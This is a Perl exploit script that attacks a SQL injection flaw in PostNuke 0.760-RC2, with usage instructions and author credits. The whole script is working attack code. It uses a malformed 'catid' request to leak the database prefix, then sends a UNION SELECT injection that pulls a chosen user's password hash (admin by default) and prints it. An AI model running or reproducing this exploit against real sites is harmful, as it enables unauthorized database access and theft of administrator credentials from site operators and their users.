#!/usr/bin/perl use IO::Socket; # Maksymilian Arciemowicz # # GPG http://cxsecurity.com/gpg/key.pgp # Ctitical SQL INCJECTION # POSTNUKE 0.760-RC2=>x # # # thx sp3x,nagash(from T-NAS),ladyBMS # CXSecurity if (@ARGV < 3) { print "[cXIb8O3] EXPLOIT for PostNuke 0.760-RC2=>x\r\n"; print " \r\n"; print "perl pn-0760RC2-cXIb8O3.pl HOST /DIR/ USER_ID\r\n\r\n"; print "HOST - Host where is postnuke example: http://localhost\r\n"; print "DIR - Directory to PN example: /PostNuke-0.760-RC2/html/\r\n"; print "UID - standart Admin=2\r\n\r\n"; print "example cmd: perl pn-0760RC2-cXIb8O3.pl http://localhost /html/ 2\r\n\r\n"; exit(); } $HOST = $ARGV[0]; $DIR = $ARGV[1]; $UID = $ARGV[2]; print "\r\nATTACK HOST IS: ".$HOST."\r\n\r\n"; $HOST =~ s/(http:\/\/)//; $path .= $DIR; $path .= "index.php?catid='cXIb8O3"; $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error 404\r\n\r\n"; print $get1 "GET $path HTTP/1.1\r\n"; print $get1 "Host: $HOST\r\n"; print $get1 "Accept: */*\r\n"; print $get1 "Connection: close\r\n\r\n"; while ($odp = <$get1>) { if ($odp =~ /ORDER BY (.*)stories.pn_time/) { $exploit .= $DIR; $exploit .= "index.php?catid=-99999%20UNION%20SELECT%20pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,null,null,pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,pn_pass,null,null,null,null,null,null%20FROM%20"; $exploit .= $1; $exploit .= "users%20WHERE%20pn_uid="; $exploit .= $UID; $exploit .= "/* "; print "\r\nDB PREFIX IS: ".$1."\r\n\r\n"; $get2 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error 404\r\n\r\n"; print $get2 "GET $exploit HTTP/1.1\r\n"; print $get2 "Host: $HOST\r\n"; print $get2 "Accept: */*\r\n"; print $get2 "Connection: close\r\n\r\n"; while ($odpi = <$get2>) { if ($odpi =~ /0">([0-9a-f]{32})<\/a>/ ) { printf "Password for a user with id ".$UID." is ".$1."\r\n\r\n"; }}}}